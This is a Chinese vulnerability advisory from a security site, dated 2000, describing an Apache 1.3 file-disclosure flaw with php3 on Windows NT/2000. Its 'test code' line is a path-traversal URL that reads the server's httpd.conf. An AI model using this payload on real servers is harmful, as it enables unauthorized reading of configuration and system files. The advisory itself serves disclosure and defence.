首页
焦点原创
安全文摘
安全工具
安全漏洞
焦点项目
焦点论坛
关于我们
English Version
最近严重漏洞
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞
Apache Web Server带php3存在泄露文件信息漏洞
发布时间:
2000-12-11
更新时间:
2000-12-11
严重程度:
中
威胁程度:
远程非授权文件存取
错误类型:
输入验证错误
利用方式:
服务器模式
受影响系统
Apache Group Apache 1.3
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
详细描述
通过请求特殊的URL,可以导致远程用户获得读取已知文件名的信息。
测试代码
http://target/index.php3.%5c../..%5cconf/httpd.conf
解决方案
尚无
相关信息
